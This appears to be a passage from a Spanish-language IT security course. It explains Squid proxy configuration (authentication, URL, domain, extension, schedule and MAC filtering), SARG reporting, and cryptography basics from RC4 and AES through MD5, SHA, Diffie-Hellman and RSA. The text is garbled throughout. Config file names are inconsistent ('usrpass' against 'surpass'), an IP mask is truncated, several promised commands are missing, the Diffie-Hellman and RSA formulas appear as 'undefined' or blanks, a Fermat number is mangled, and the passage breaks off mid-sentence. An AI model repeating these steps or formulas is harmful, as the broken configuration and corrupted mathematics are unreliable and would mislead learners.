• Se integra con el Directorio Activo de Microsoft.

INSTALACIÓN DE SQUID
Para la instalación, ejecutad el siguiente comando en la consola de una distribución Linux
basada en Debian:
# apt-get install squid
CONFIGURACIÓN DE SQUID: ACCESO POR AUTENTIFICACIÓN

Para poder acceder a Internet, Squid puede denegar o permitir acceso basándose en
la dirección IP o usuario que demanda el servicio. La configuración de Squid se realiza
modificando el fichero /etc/squid/squid.conf.
Para probar un ejemplo de forma sencilla, vamos a utilizar el módulo NCSA, que utiliza un
archivo de texto simple creado con htpasswd para autenticar a los usuarios del proxy.
1. Para la poder usar el comando htpasswd necesitamos instalar apache2-utils:
# apt-get install apache2-utils
2. Crearemos nuestro archivo de claves:
# touch /etc/squid/usrpass
3. Ajustamos los permisos para que solamente Squid tenga permisos de lectura y
escritura:
# chmod 600 /etc/squid/usrpass
# chown proxy:proxy /etc/squid/surpass
4. Empezaremos a añadir usuarios. Hay que tener en cuenta que todos los usuarios
creados son independientes de los usuarios del sistema. Para añadir usuarios
usaremos htpasswd:
# htpasswd /etc/squid/surpass <nombre de usuario>
Tras introducir la línea anterior, nos pedirá introducir una clave.
5. Descomentar y editar del archivo /etc/squid/squid.conf, la línea que empieza por:
#auth_param basic program por la siguiente línea:
auth_param basic program /usr/lib/squid/ncsa_auth /etc/squid/usrpass
6. En el mismo archivo de configuración, buscamos un texto descomentado parecido
a:
# Recommended minimum configuration:
• acl all src all
• acl manager proto cache_object
• acl localhost src 127.0.0.1/3

• acl to_localnet dst 127.0.0.1/8 0.0.0.0/32
7. Añadiremos la línea:
acl password proxy_auth REQUIRED
8. También buscaremos el texto parecido a:
# Example rule allowing access from your local networks.
# Adapt localnet in the ACL section to list your (internal) IP networks
# from where browsing should be allowed
http_access allow localhost
http_access deny all
Para que quede así:
# Example rule allowing access from your local networks.
# Adapt localnet in the ACL section to list your (internal) IP networks
# from where browsing should be allowed
http_access allow localnet password
http_access allow localhost
http_access deny all
9. Finalmente, aplicaremos cambios con el comando:
# service squid reload
Squid también soporta autenticación a través de LDAP. Para practicar, se puede instalar
OpenLDAP y definir usuarios, aunque no cubriremos los servidores LDAP en este temario.
Añade la siguiente línea al archivo /etc/squid/squid.conf con la configuración de nuestro
LDAP:
auth_param basic program /usr/lib/squid/squid_ldap_auth –b
“ou=Usuarios,dc=xxx,dc=zzzz” 127.0.0.1
Sustituye el valor «ou=Usuarios,dc=xxx,dc=zzzz» por el valor real del directorio y el valor
127.0.0.1 por el valor real de la IP de tu servidor de LDAP.
CONFIGURACIÓN DE SQUID: RESTRICCIÓN DE ACCESO A SITIOS

DE INTERNET
Mediante expresiones regulares con Squid se puede determinar si el sitio de Internet está
permitido. Por ejemplo, se podría prohibir diferentes patrones de sitios web considerados
potencialmente peligrosos, o bien sitios con contenidos no recomendados en un centro
de trabajo. La prohibición del acceso a YouTube podría evitar la saturación de la red.

Para aplicar al servidor, restricciones por expresiones regulares, deberemos realizar los
siguientes pasos:
1. Crearemos un archivo con expresiones regulares. En el siguiente comando, usaremos
el editor nano para crear y editar el fichero:
# nano /etc/squid/restric-exp-reg
2. Al archivo creado añadiremos palabras clave que describirían sitios que consideremos
como inadecuados. Por ejemplo:
• sex
• porn
• chat
• virus
• musica
• torrent
• emule
• hacking
3. Ahora tendremos que configurar el archivo /etc/squid/squid.conf para que pueda

identificar el archivo con nuestras expresiones regulares. Añadiremos la siguiente
línea:
acl restric-exp-reg url_regex “/etc/squid/restric-exp-reg”
Lo configurado hasta ahora con la nueva línea tendría un aspecto parecido a este:
acl all src all
acl manager proto cache_object
acl localhost src 127.0.0.1/32
acl to_localnet dst 127.0.0.1/8 0.0.0.0/32
4. Aplicaremos las restricciones que hemos identificado. Para esto, seguiremos
modificando el archivo /etc/squid/squid.conf. Modificaremos la regla anteriormente
creada para que se muestre como en la siguiente línea:
http_access allow localnet password !restric-exp-reg
5. Terminaremos aplicando los cambios en el archivo /etc/squid/squid.conf con el
siguiente comando:

También podremos denegar acceso por dominio. Los pasos son parecidos a los de la
aplicación de restricciones por expresiones regulares:
1. Crearemos un archivo con los dominios a restringir. En el siguiente comando, usaremos
el editor nano para crear y editar el fichero:
# nano /etc/squid/restric-dominios
2. Al archivo creado añadiremos los dominios o extensiones web que consideremos
como inadecuados. Por ejemplo:
• www.hotmail.com
• .facebook.com
• www.juegos.com
• .co.uk .fr
3. Configuraremos el archivo /etc/squid/squid.conf para que pueda identificar el
archivo con nuestros dominios. Añadiremos la siguiente línea:
acl restric-dominios dstdomain “/etc/squid/restric-dominios”
Lo configurado hasta ahora, con la nueva línea, tendría un aspecto parecido a este:
#
acl all src all
modificando el archivo /etc/squid/squid.conf. Modificaremos la regla anteriormente
creada para que se muestre como en la siguiente línea:
http_access allow localnet password !restric-exp-reg !restric-dominios
siguiente comando:
Es posible que las restricciones de acceso anteriores no dejen acceso a páginas que
consideramos válidas. Por esto podremos elegir una serie de dominios permitidos. Estos

serían los pasos:
1. Crearemos un archivo con los dominios permitidos. En el siguiente comando,
usaremos el editor nano para crear y editar el fichero:
# nano /etc/squid/permit-dominios
2. Al archivo creado añadiremos los dominios o extensiones web que consideremos
adecuados. Por ejemplo:
• .google.co.uk
• .bbc.co.uk
• www.juegos.com/ejemplo.html
• .edu
• .gov
• .org

archivo con nuestros dominios. Añadiremos la siguiente línea:
acl permit-dominios dstdomain “/etc/squid/permit-dominios”
Lo configurado hasta ahora, con la nueva línea, tendría un aspecto parecido a este:
#
acl all src all
modificando el archivo /etc/squid/squid.conf. Añadiremos la siguiente línea:
http_access allow all permit-dominios
siguiente comando:

CONFIGURACIÓN DE SQUID: RESTRICCIÓN DE ACCESO AL
CONTENIDO POR EXTENSIÓN
Squid también puede restringir acceso a ciertos archivos. Podría evitar la saturación del
ancho de banda de la red. Consiste en la denegación de ciertas extensiones de archivos
que se establecerán en una Lista de Control de Acceso. Un ejemplo de restricción de
extensión de archivos sería la de archivos ejecutables .exe. Evitando la descarga de
ejecutables pondríamos más difícil la instalación de virus desde Internet.
Seguiremos con el procedimiento de crear un fichero con los filtros, declararlo y usarlo
en el archivo de configuración de Squid /etc/squid/squid.conf. Estos serían los pasos en
detalle:
1. Crearemos un archivo con las extensiones que no permitiremos. En el siguiente

comando, usaremos el editor nano para crear y editar el fichero:
# nano /etc/squid/restrict-extensiones
2. Al archivo creado añadiremos extensiones de archivos que no permitiremos, del
siguiente modo:
• \.mp4$
• \.mp3$
• \.mpg$
• \.mpeg$
• \.wma$
• \.wmv$
• \.wav$
• \.bat$
• \.exe$

archivo creado. Añadiremos la siguiente línea:
4.
acl restrict-extensiones urlpath_regex “/etc/squid/restrict-extensiones”
Lo configurado hasta ahora, con la nueva línea, tendría un aspecto parecido a:
#

acl all src all
acl restrict-extensiones urlpath_regex “/etc/squid/restrict-extensiones”
modificando el archivo /etc/squid/squid.conf. Añadiremos la siguiente línea:
http_access allow localnet password !restric-exp-reg !restric-dominios !restrict-
extensiones
siguiente comando:
CONFIGURACIÓN DE SQUID: RESTRICCIÓN DE ACCESO POR

HORARIOS
La restricción de acceso a Internet a horarios es bastante importante en aspectos de
empresa. De esta manera, se evita que los empleados dejen descargas de Internet toda
la noche y saturen aquellos procesos de empresa que necesitan ser ejecutados como es
el caso de las actualizaciones.
Las reglas de restricción por horarios se crean directamente en el fichero de configuración
de Squid, /etc/squid/squid.conf.
En el siguiente ejemplo, vamos a definir y aplicar una regla que da permiso a las conexiones
los lunes, martes, miércoles, jueves y viernes, desde las 8:30 a 19:30 en la red local.
Esta sería la declaración de ejemplo:
acl entre_semana time MTWHF 08:30-19:30

“entre_semana”, sería el nombre del acl
“MTWHF”, donde cada letra sería un día de la semana en inglés:
S - Domingo

M - Lunes
T - Martes
W - Miércoles
H - Jueves
F - Viernes
A – Sábado
“08:30-19:30”, horario desde las 08:30 hasta las 19:30
La declaración esta regla de ejemplo se podría aplicar de este modo:
http_access allow entre_semana localnet
http_access, es un comando que ya hemos usado antes y que aplica la regla según sus
parámetros.
allow, cuyos posibles valores serían allow (permitir), deny (no permitir)
entre_semana
, nombre declarado en el ejemplo anterior
localnet, ámbito de la red en el que se aplica. En este caso sería la red local.
Siempre que modifiquemos el /etc/squid/squid.conf, ejecutaremos el siguiente comando
desde consola:
CONFIGURAR SQUID CON SOPORTE PARA DIRECCIONES MAC

Mediante las direcciones MAC se identifica de forma única una tarjeta o dispositivo de
red. Si bloqueamos o permitimos acceso a ciertas direcciones MAC estaremos evitando
que ciertas computadoras puedan conectarse para realizar daños en la red, aunque
para eso el proxy debe estar en la misma red de área local virtual (VLAN) que los usuarios.
Un ejemplo útil sería el empleado que ha sido despedido y deja una computadora libre.
Las direcciones MAC consisten en un identificador de 48 bits expresada con 12 dígitos
hexadecimales. De estos 12 dígitos, los 6 primeros corresponden al fabricante de la tarjeta
y los otros 6 dígitos corresponden al número de serie que el fabricante ha puesto a ese
dispositivo de red.
En los siguientes pasos vamos a configurar la restricción de acceso a la red usando las
direcciones MAC:
1. Conseguimos las direcciones MAC en nuestra red, de las computadoras que

queremos aplicar la regla. En Windows se usa el comando ipconfig y en Linux se
utiliza el comando ifconfig, para ver la dirección MAC del equipo en el que nos
encontramos.

Ilustración 26 Comando ipconfig en Windows.
Ilustración 27 Comando ifconfig en Linux
2. Crearemos un archivo donde vayamos a poner las direcciones MAC a las que
aplicaremos la regla.
# nano /etc/squid/permit-mac-direcciones
Tendremos que editar su contenido con las direcciones MAC para las que queremos
aplicar la regla.
00:14:22:41:9C:8A
00:04:DC:84:18:AD
00:40:96:AA:2D:BB
00:30:BD:9D:CD:77
3. Definiremos nuestra regla añadiendo al /etc/squid/squid.conf la línea:
acl permit-mac-direcciones arp /etc/squid/permit-mac-direcciones”
4. Aplicaremos nuestra regla añadiendo al /etc/squid/squid.conf la línea:
http_access allow permit-mac-direcciones
5. Aplicaremos los cambios con hechos en el /etc/squid/squid.conf. Desde la consola
ejecutar el siguiente comando:

OTRAS CONFIGURACIONES
En /etc/squid/squid.conf se deben tener configurado los siguientes puntos:
1. http_port, que especifica el puerto por el que se comunica con el proxy, por ejemplo:
http_port 1891 transparent
2. cache_dir, que es el directorio donde se especifica el directorio donde se almacena
la cache y las opciones de tamaño. En el siguiente ejemplo se define el directorio
/var/spool/squid, con formato ufs, 200 MB, dividido en 20 directorios de hasta 400
niveles cada uno:
cache_dir ufs /var/spool/squid 200 20 400
3. error_directory, con el directorio donde se almacenan los mensajes de error en
nuestro idioma, por ejemplo:
error_directory /usr/share/squid/errors/Spanish
SARG
Con la herramienta SARG (Squid Analysis Report Generator) se permite ver con detalle la
actividad de todos los equipos y usuarios de una red local usando los registros (logs) de
Squid.
1. Busca y modifica las líneas output_dir, access_log, date_format, overwrite_report

en el fichero /etc/sarg/sarg.conf. Para que queden de la siguiente forma:
access_log /var/log/squid/access.log
output_dir /var/www/sarg
date_format e
overwrite_report yes
De esta manera, decimos que el log que queremos acceder con la herramienta SARG es
/var/log/squid/access.log, que el directorio donde se generarán los informes será /var/
www/sarg (si no existe el directorio, habrá que crearlo), el formato de la fecha (‘dd/mm/
yy‘) que se usará y si sobrescribimos informes ya generados.
2. Ejecutaremos la generación de informes con el siguiente comando:
# sarg –x
3. Finalmente, iremos a la URL http://<ip-máquina-linux>/sarg y veremos los logs que
se han ido registrando.

9. Blockchain, criptografía y
seguridad de datos.
9.1. Cifrado simétrico
CIFRA EN FLUJO
La Figura 1 muestra el esquema de un sistema de cifra en flujo.
Ilustración 28 Esquema de la cifra de flujo
Siguiendo el esquema de la Figura 1, estos sistemas de cifra se resumen en las siguientes

tres características:
• Un algoritmo de cifrado y descifrado con la función XOR.
• Una secuencia cifrante binaria y pseudoaleatoria Si que se obtiene a partir de
una clave secreta K y un algoritmo generador de esa secuencia.
• Una misma operación de cifrado que de descifrado debido el carácter
involutivo de la función XOR.
ALGORITMO DE CIFRA EN FLUJO, RC4

En cuanto a RC4, es el acrónimo de Ron’s Code 4, un algoritmo de cifra en flujo byte a byte
diseñado por Ron Rivest en 1987. Su uso más habitual se encontraba hasta el año 2014
en el protocolo SSL/TLS, especialmente al utilizar Internet Explorer, aunque se usa también
en PEP Wired Equivalent Privacy y en WPA Wi-Fi Protected Access, para el cifrado en redes
inalámbricas.
El algoritmo consta dos rutinas: KSA, con la que se genera la clave; y PRGA, con la que se
cifra cada byte del texto en claro con un nuevo byte de la secuencia de clave, y que se
muestran en la Figura 2.

Ilustración 29 Rutinas KSA y PRGA de RC4.
Su popularidad estaba basada fundamentalmente en su alta velocidad y la simplicidad

de diseño, tanto hardware como software, y es casi el doble de rápido que AES, el actual
estándar de cifra simétrica.
CIFRA EN BLOQUE
En la cifra simétrica en bloque, la información a cifrar o texto en claro se agrupa en bloques
n de bits, típicamente 128 bits o 16 octetos. Estos bloques de bits entran al cifrador y se
mezclan con los bits clave, mediante diversas operaciones tanto de permutación como
de sustitución; por esto también son conocidos como cifradores de producto.
Cada bloque de texto en claro se convierte en un bloque de texto cifrado, como se
muestra en la Figura 3. Al final del texto en claro se ha añadido un relleno por si este no es
congruente con el tamaño del bloque.
Ilustración 30 Bloques en la cifra simétrica. Fuente: Ramió, 2006.
Para que los bits del texto en claro se mezclen lo suficiente con los bits de la clave, habrá
que aplicar permutaciones y sustituciones en esos bits varias veces. En criptografía, a
estas operaciones repetitivas se les llama vueltas o rondas del algoritmo. Con ello se
logra, entre otras características interesantes, el denominado efecto de avalancha; esto
es, que el cambio de un solo bit en la entrada (o en la clave) produzca un cambio en
aproximadamente el 50 % de los bits de salida. En otras palabras, que cada bit de salida
sea una función compleja que dependa en un 50 % de cada bit de entrada.

Ilustración 31 Esquema de la cifra simétrica.
La Figura 4 muestra el esquema de un cifrado simétrico y las operaciones características

que se realizan en cada fase del algoritmo. Cada bloque se cifra durante varias vueltas
en las que se usa una subclave, que se calcula a partir de la clave de cifra K con una
función que se conoce como expansión de clave, de forma que en cada vuelta esta sea
distinta.
MODOS DE CIFRA EN BLOQUE
Aunque existe una media docena modos de cifra, los más conocidos son: ECB (Electronic
CodeBook), CBC (Cipher Block Chaining) y CTR (Counter).
MODO ECB
El modo de cifra por libro electrónico de códigos ECB (Electronic Codebook) consiste en
cifrar bloques de texto en claro de manera independiente. Así, cada bloque de x bits del
texto en claro se cifra con la clave K del algoritmo y entrega un bloque de texto cifrado
de x bits.
No se recomienda el uso de este modo porque es vulnerable a ataques por inicios y
finales iguales entre dos documentos diferentes, así como a ataques por repetición de
bloques elegidos o bien modificados.
MODO CBC
En el modo de cifra por encadenamiento de bloques cifrantes (Cipher Block Chaining)
CBC, se usa una segunda clave de igual tamaño que el bloque de texto a cifrar, llamada
vector inicial IV, con la cual se realiza un OR exclusivo con el primer bloque del texto en
claro a cifrar, antes de comenzar la cifra.
El resultado de la cifra de esta nueva entrada con la clave K, es decir C1, se usará como
vector inicial del siguiente bloque de texto a cifrar, y así sucesivamente. Por tanto, se va

encadenando el cifrado anterior con el nuevo cifrado, usándolo como vector de suma OR
exclusivo para el nuevo bloque de texto a cifrar.
Ilustración 32 Modo de cifra CBC Cipher Block Chaining. Fuente: Ramió, 2006.
Para descifrar con este método, una vez se ha aplicado el algoritmo de descifrado
al primer subcriptograma con la clave K, se recupera el texto en claro realizando una
suma OR exclusivo con el vector inicial IV. Los siguientes bloques de subcriptogramas
se descifran de igual manera, pero utilizando ahora como vector inicial el criptograma
anterior, que hemos guardado previamente en un registro temporal.
Un error en la transmisión utilizando el modo CBC afectará a todo el resto del criptograma.
Unido a esto, aparece el problema asociado de que CBC no permite paralelizar la
operación de descifrado, algo a tener en cuenta cuando hablamos de cifrado de grandes
volúmenes de información.
MODO CTR
El modo CTR es similar al CBC, pero soluciona el problema del no paralelismo que tiene
CBC. Además, a diferencia del modo CBC un error de transmisión afectará solo al bloque
en cuestión, no a los siguientes.
CTR usa ese mismo vector inicial IV, pero en modo contador y no sumándolo XOR al texto
en claro, sino como entrada al propio algoritmo de cifra, de forma que para el primer
bloque su valor es IV, para el segundo bloque es IV+1, etc. La salida de esa cifra se suma
OR exclusivo con el bloque de texto en claro a cifrar.

Ilustración 33 Modo de cifra CTR Counter. Fuente: Wikipedia
ALGORITMO DE CIFRA EN BLOQUE, AES

El algoritmo AES (Advanced Encryption Standard) nace como el sustituto del DES como
estándar mundial de cifra simétrica. En noviembre de 2001, el NIST anuncia oficialmente
a través del Federal Information Processing Standard Publications, FIPS 197, que el nuevo
estándar para cifrado simétrico del siglo XXI será el AES.
AES es un algoritmo no de tipo Feistel, que procesa bloques completos de texto en claro de
128 bits, con claves estándar de 128, 192 o 256 bits. Para ello, usa una matriz de estado de
tamaño 4x4, cuyas 16 celdas o bytes van cambiando de valor de acuerdo con los procesos
que ejecuta el algoritmo. En el cifrado se utilizan técnicas de sustitución y permutación, en
algunos casos con operaciones polinómicas dentro de un cuerpo. Todas las operaciones
de cifra dentro de la matriz de estado se realizan sobre bytes, en palabras de 32 bits que
se escriben de arriba hacia abajo y de izquierda a derecha.
• Las cuatro operaciones básicas de cifrado en el AES son AddRoundKey,

SubBytes, ShiftRows y MixColumns (ver Figura 7).
• La operación AddRoundKey ejecuta la suma OR exclusivo entre los bytes del
mensaje y los bytes de la clave.
• La operación SubBytes ejecuta una sustitución de cada uno de los 16 bytes
de la matriz de estado mediante una tabla.
• La operación ShiftRows consiste en una permutación de las filas del estado
de forma que la primera fila no rota, la segunda rotará un byte, la tercera
rotará 2 bytes y la cuarta rotará 3 bytes.
• La operación MixColumns es algo más compleja y consiste en multiplicar
cada una de las columnas de la matriz de estado por una matriz polinómica.

Ilustración 34 Esquema del algoritmo AES y matriz de estado. Fuente: Ramió, 2006.
Aunque las operaciones que realizan estas funciones pueden representarse por tablas
o figuras, de muy fácil comprensión, lo cierto es que están soportadas por ecuaciones
polinómicas. Es decir, el algoritmo AES tiene un importante fondo matemático.
9.2. Funciones hash

Las funciones hash son algoritmos que al aplicarlos sobre un mensaje, archivo o texto
M, entregan un resumen de x bits conocido como h(M). Se trata de un número que a
modo de huella digital representará a dichos documentos de forma supuestamente
única. A diferencia de la popular familia de aplicaciones de tipo zip para la compresión
de archivos, las funciones hash entregan siempre un resumen de un número fijo de bits,
independientemente del tamaño de ese archivo. Es importante recalcar que, en tanto
carecen de claves, las funciones hash no pueden considerarse propiamente como
algoritmos de cifra.
Las funciones hash juegan dos papeles muy importantes en la criptografía:
Como reducen el tamaño de un documento a una huella digital de un conjunto
pequeño de bits, normalmente unas centenas de bits permiten adaptar ese documento
para su firma digital, en tanto los algoritmos de clave pública que se usan para la firma
digital son muy lentos (Kbytes/s) y no sería por tanto eficiente firmar documentos de
miles o millones de bytes.
Como una de las propiedades de estas funciones es que, si se altera algún bit del mensaje,
accidentalmente durante el tránsito o bien de forma deliberada, el resumen de ese otro
mensaje será distinto, permitirá comprobar la integridad del mensaje.
Adicionalmente, hay muchas aplicaciones que requieren contraseñas, como pueden ser

los sistemas de foros o bien servidores de correo, donde lo que se almacena en el servidor
no es la contraseña del usuario sino el hash de esa contraseña. Esto último no se hace
con el propósito de comprimir la contraseña, que con toda seguridad será más corta
que el hash generado, sino con el propósito de que, si alguien tiene acceso al almacén
de contraseñas, no pueda ver la contraseña como texto en claro y, por tanto, no pueda
tener acceso al sistema, a no ser que rompa esa contraseña por fuerza bruta u otro tipo
de ataque si conoce qué función hash se ha empleado.
FUNCIÓN HASH MD5

Diseñada en 1992 por Ron Rivest, esta función resumen está obsoleta desde mediados
de 2005 al detectarse graves fallos en su diseño y, además, al ser su resumen de solo
128 bits. No obstante, se ha seguido utilizando hasta bien entrada la década de 2010,
especialmente en aplicaciones para comprobar la integridad de archivos, acceso a
cuentas de correo, así como en redes P2P.
MD5 procesa los mensajes en bloques de 512 bits y produce una salida de 128 bits. En
primer lugar, expande el mensaje M hasta una longitud exactamente 64 bits inferior a
un múltiplo de 512 bits. Para ello, añade como relleno un bit uno seguido de tantos bits
ceros como sean necesarios, reservando los últimos 64 bits para indicar la longitud del
mensaje (ver Figura 9).
El algoritmo tiene cuatro vectores iniciales ABCD, palabras de 32 bits cada uno, con
los siguientes valores en hexadecimal: A = 01234567, B = 89ABCDEF, C = FEDCBA98, D =
76543210. A los vectores ABCD, que no son secretos, y al primer bloque de 512 bits se
le aplicarán 64 operaciones de 32 bits obteniéndose cuatro nuevos vectores ABCD que
serán los vectores de entrada para el siguiente bloque de 512 bits. Esta acción se repite
con los restantes bloques del documento, encadenando los sucesivos vectores ABCD. El
último bloque ABCD entregará el resumen final h(M) de 128 bits del mensaje M.
Ilustración 35 Formación de bloques en MD5 y esquema del hash. Fuente: Ramió, 2006.

MD5 realiza para cada bloque de entrada un total de 64 vueltas, con 16 operaciones en
cada una de estas 4 rondas los vectores se combinan de la siguiente forma:
• 1ª ronda F = (B AND C) OR (NOT B AND D)
• 2ª ronda G = (B AND D) OR (C AND NOT D)
• 3ª ronda H = (B XOR C XOR D)
• 4ª ronda I = (C XOR (B OR NOT D))
En cada función FGHI se usan las 16 palabras del bloque de 512 bytes (16 x 32 bits), bloques
que van desde M0 hasta M15. Asimismo, en cada vuelta de las 64 vueltas se usan unas
constantes Ki y desplazamientos s que vienen dados en unas tablas.
FUNCIÓN HASH SHA-1

SHA-1, acrónimo de Secure Hash Algorithm, propuesto inicialmente en 1993 por la NSA y
adoptado como estándar en 1995 por el NIST, sustituye al primer algoritmo de resumen
SHA-0 en el que se habían detectado problemas. SHA-1 es muy similar a MD5, ya que
también trata bloques de 512 bits de mensaje y sus operaciones lógicas son muy similares,
si bien genera un resumen de 160 bits pues cuenta con 5 vectores de 32 bits, ABCDE, en vez
de los 4 de MD5. En este caso, para cada bloque se realizan un total de 80 operaciones
con palabras de 32 bits, organizadas en 4 rondas de 20 vueltas cada una.
Terminadas las primeras 80 vueltas, los vectores iniciales ABCDE habrán cambiado
varias veces de valor, y serán los nuevos 5 vectores ABCDE los que se mezclarán con el
segundo bloque de 512 bits de entrada. Esta acción se repite y se va encadenando con
los siguientes bloques, hasta que el último valor de los vectores ABCDE es el resumen de
160 bits de todo el documento. Los vectores públicos en este caso son:
• A = 67452301,
• B = EFCDAB89,
• C = 98BADCFE,
• D = 10325476,
• E = C3D2E1F0.
Dependiendo de la ronda, los vectores se combinan de la siguiente forma:
• 1a ronda F = (B AND C) OR (NOT B AND D)
• 2a ronda G = (B XOR C XOR D)
• 3a ronda H = (B AND C) OR (B AND D) OR (C AND D)
• 4a ronda I = (B XOR C XOR D)

FUNCIÓN HASH SHA-256 Y SHA-3
En octubre de 2012, el NIST elige como ganador de SHA-3 al algoritmo Keccak, declarado
como estándar mundial en agosto de 2015 por ese mismo organismo. Como desde que
un algoritmo se declara como estándar mundial hasta que su uso puede considerarse
masivo, pasan fácilmente 10 años (el AES solo comienza a usarse de manera masiva en
comunicaciones SSL/TLS, diez años después de ser declarado nuevo estándar mundial de
cifra simétrica), la NSA desarrolla en 2001 una familia de algoritmos hash conocida como
SHA-2, que consiste en un conjunto de cuatro funciones hash de 224, 256, 384 y 512 bits.
En estos dos últimos se trabaja con palabras de 64 bits. Su funcionamiento es muy similar
al visto en MD5 y SHA-1.
En cuanto al algoritmo SHA-3, comentar que no tiene un esquema como los de la familia
SHA y MD5, que todos eran muy similares en su concepción, sino que se trata de un
sistema conocido como esponja en el que la entrada es una cadena de bits de cualquier
longitud, que son absorbidos por esa esponja, y se obtiene una salida del tamaño de bits
que se desee exprimiéndola. En su concepción, el algoritmo es bastante más complejo y
se interpreta como un array en tres dimensiones, con movimientos simulares a los que se
realizan sobre un cubo de Rubik.
A diferencia de MD5, definitivamente roto, el hash SHA-1 podría considerarse hoy en día
medianamente seguro, si bien el febrero de 2017 sufrió un importante y detallado ataque,
denominado SHAttered. Se ha usado en certificados digitales X.509 hasta 2016, pues a
partir del 1 de enero de 2017 ya no se usa y en su lugar aparece SHA- 256. Por ello, es
recomendable usar en 2017 la familia SHA-2 o bien el nuevo estándar SHA-3.
9.3. Cifrado asimétrico

La cifra asimétrica, conocida también como cifra por clave, tiene sus inicios en noviembre
de 1976 cuando dos investigadores de la Universidad de Stanford, Whitfield Diffie y Martin
Hellman, proponen un nuevo esquema de cifra.
El nuevo sistema está basado en que la clave deja de ser única y, por tanto, secreta al estar
compuesta por dos partes: una pública y conocida por todo el mundo; y la otra secreta,
o privada, y conocida solo por su propietario. Mediante propiedades matemáticas de los
cuerpos finitos, ambas claves son inversas entre sí y solo el dueño de esa clave puede
a partir de una calcular la otra. A cualquier usuario que conozca la clave pública de
otro usuario o del equipo en el sistema le será computacionalmente imposible descubrir
la clave privada correspondiente, porque deberá enfrentarse a un problema de tipo NP
(tiempo polinomial no determinista).
Cifra con la clave pública del destinatario. Si se cifra con la clave pública del destino,
entonces solamente ese destinatario (y no otro) será capaz de descifrar el criptograma
enviado, pues solo él o ella están en posesión de la clave privada. Esto es lo que en la
práctica se conoce como intercambio seguro de clave. Resumiendo, cifrando con la
clave pública del destino, se obtiene la confidencialidad.
Cifra con la clave privada del emisor. Si el emisor cifra con su clave privada, podrá
descifrar ese criptograma y recuperar mensaje original todo aquel que conozca la clave
pública del emisor. El mensaje en este caso no es un secreto porque lo pueden recuperar
todos los usuarios que conozcan la clave pública del emisor. Sin embargo, quienes lo

descifran pueden estar seguros de que ese mensaje es de ese emisor y no de otra persona,
porque nadie excepto esa persona conoce esa clave privada. Si a ello unimos que lo que
normalmente se cifra en el extremo emisor es el hash de un documento, entonces todo el
proceso se conoce como firma digital y en el extremo receptor, además de autenticidad
del emisor, se podrá comprobar la integridad del mensaje debido a las propiedades de
las funciones hash.
Aunque de forma genérica se hable de texto en claro o de mensaje M, lo cierto es que
con estos sistemas asimétricos solo se cifran números. Más aún, números de unas pocas
centenas de bits, como podrían ser una clave secreta o de sesión de un algoritmo
simétrico como AES que se intercambia entre dos interlocutores, cliente y servidor, por
ejemplo, o bien el valor de un hash SHA-256 que se va a firmar digitalmente. Para cifrar
mensajes de mayor tamaño se utilizan los algoritmos de cifra simétrica que poseen una
tasa de cifra mil veces superior.
INTERCAMBIO DE CLAVE DE DIFFIE Y HELLMAN

En 1976, Whitfield Diffie y Martin Hellman un algoritmo para intercambiar una clave secreta
de manera computacionalmente segura, usando para ello funciones matemáticas de
un solo sentido o unidireccionales. Esto significa que, si bien el sistema puede romperse
matemáticamente, para los valores estándar de miles de bits que se usan en la práctica,
el problema se vuelve intratable, tanto en recursos de cálculo como en tiempo. Y ahí
radica su seguridad.
Diffie y Hellman usaron en su propuesta la función de un solo sentido conocida como
problema del logaritmo discreto. Encontrar el resultado de la expresión
conocidos el generador undefined, y el primo, es sencilla y rápida, incluso para números
grandes. Sin embargo, conociendo undefined, encontrar ahora el valor del exponente
exponente, se convierte en un problema de muy difícil solución para números grandes.
El algoritmo propuesto por Diffie y Hellman es el siguiente. Alicia y Bernardo, que se
encuentran distantes, eligen un primo
ρ y un número undefined dentro de ese primo, conocido como generador del primo.
Ambos valores son públicos. Acto seguido, cada uno elige un número secreto que no
conoce el otro. Así, Alicia elige el número secreto y Bernardo elige el número secreto . A
continuación, realizan el siguiente protocolo:
• Alicia usa su clave secreta , calcula se lo envía a Bernardo.

• Bernardo usa su clave secreta, , calcula s y se lo envía a Alicia.
• Bernardo recibe y con su clave secreta calcula:
• Alicia recibe y con su clave secreta calcula:
• La clave intercambiada entre Alicia y Bernardo será:
Una vez terminado el protocolo, ambos comparten un mismo valor K que puede usarse

como clave de sesión de forma segura. Cualquier intruso que conozca los datos públicos
undefined, así como los valores intercambiados y, para poder encontrar los valores
secretos de Alicia y de Bernardo y, por tanto, poder calcular, se enfrentará al problema
del logaritmo discreto, que para valores de p superiores a los mil bits se vuelve intratable.
Nótese que el valor α debe ser una raíz primitiva o generador del primo p. Una raíz
primitiva o generador dentro de un primo p, es aquel resto de ese primo que genera el
conjunto completo de restos, excepto el 0, al hacer la operación de elevarlo a dichos
restos reducido módulo p.
EL ALGORITMO RSA
Es en febrero de 1978, es decir, poco más de un año después de la propuesta de Diffie

y Hellman, cuando otros tres investigadores norteamericanos, Ron Rivest, Adi Shamir y
Leonard Adleman, del Instituto Tecnológico de Massachusetts MIT, proponen un sistema
de cifra que llevará las iniciales de sus apellidos. El algoritmo se patentará como RSA.
A diferencia del intercambio de clave de DH, RSA basa su fortaleza en la dificultad
computacional de factorizar un número producto de dos primos grandes y encontrar tales
factores primos. Este problema tiene una complejidad algorítmica similar al problema del
logaritmo discreto, siendo también inabordable para la capacidad mundial de cómputo
en nuestros días cuando se trata de valores por encima de los dos mil bits.
GENERANDO UNA CLAVE RSA

El protocolo detallado para la generación de una clave RSA, pública y privada, es el
siguiente:
• El usuario que va a generar las claves pública y privada (Alicia) elige dos
primos p y q de valores iguales o superiores a 1 024 bits. Los valores de los
primos p y q serán un secreto, solo conocido por Alicia.
• Alicia multiplican esos primos y obtiene el módulo de cifra y hace público el
módulo de cifra n.
• Ahora se calcula Indicador de Euler Φ de ese módulo n, que en el caso de dos
primos multiplicados entre sí es . Este valor es su cuerpo trampa, un número
que solo conoce su dueño.
• A partir de ese valor trampa Φn se calculará ahora la clave pública e y la
correspondiente clave privada d.
• Alicia escoge un valor de clave pública e que deberá estar en el intervalo 1 < e
< Φn y ser coprimo de Φn, es decir, que mcd [e, Φn] = 1. En la práctica, esto no
se hace, puesto que todo el mundo usará como clave pública e el número 4
de Fermat F4 = 224 + 1 = 216 + 1 = 65 537, un número primo que permite realizar
las operaciones de cifra mucho más ágilmente.

• Ese valor e será la segunda parte de su clave pública, además del módulo n.
• Usando el Algoritmo Extendido de Euclides, cada usuario calculará su clave
privada d en ese cuerpo trampa Φn.
• Finalmente, Alicia tiene dos valores que forman su clave pública (n, e) y un valor
secreto que es su clave privada (d). Además del valor d, también guardará en
